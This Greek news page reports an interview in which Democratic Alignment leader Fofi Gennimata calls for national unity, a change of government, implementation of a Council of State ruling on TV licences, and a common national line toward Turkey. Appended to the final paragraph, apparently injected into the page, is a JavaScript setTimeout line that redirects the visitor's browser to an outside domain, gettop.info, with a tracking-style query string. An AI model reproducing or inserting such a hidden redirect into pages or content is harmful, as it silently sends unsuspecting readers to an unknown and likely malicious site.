Γεννηματά: Αναγκαία η εθνική ενότητα και η εθνική γραμμή

0
3

 

Η εθνική συνεννόηση και η στήριξη της εθνικής γραμμής για την αλλαγή των όρων της συμφωνίας αποτελεί επιτακτική ανάγκη, τονίζει η επικεφαλής της Δημοκρατικής Συμπαράταξης Φώφη Γεννηματά, σε συνέντευξή της στο «Έθνος», προσθέτοντας ότι «χρειάζεται αλλαγή κυβέρνησης και αλλαγή πολιτικής».

Η κ. Γεννηματά εκτιμά ότι «αυτό τα πρόγραμμα δεν βγαίνει» και ότι στις επαφές της με τους ευρωσοσιαλιστές, συνδιαμόρφωσαν ένα μέτωπο υπέρ της χώρας «απέναντι στα συντηρητικά γεράκια της Ευρώπης», με πρώτο θέμα της ατζέντας «την προώθηση της κοινωνικής Ευρώπης ενάντια στις πολιτικές λιτότητας».

Με αφορμή την ένταση στο πολιτικό σκηνικό που έχει προκαλέσει το ζήτημα των τηλεοπτικών αδειών, η κ. Γεννηματά τονίζει ότι για τη «θεσμική εκτόνωση της κρίσης επιβάλλεται η άμεση εφαρμογή της απόφασης του ΣτΕ και η συγκρότηση νέου ΕΣΡ».

Σε ό,τι αφορά την εξωτερική πολιτική και με τη «δεδομένη γεωπολιτική αστάθεια και την προκλητικότητα της Τουρκίας», όπως επισημαίνει, προτάσσει την ανάγκη «εθνικής συνεννόησης και εθνικής γραμμής» έναντι της εθνικής περιπέτειας, όπως λέει και εγκαλεί τόσο την κυβέρνηση όσο και τη ΝΔ να μην κάνουν ότι δεν το καταλαβαίνουν γιατί τότε «δεν έχουν συναίσθηση της κατάστασης και είναι εξίσου επικίνδυνοι». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here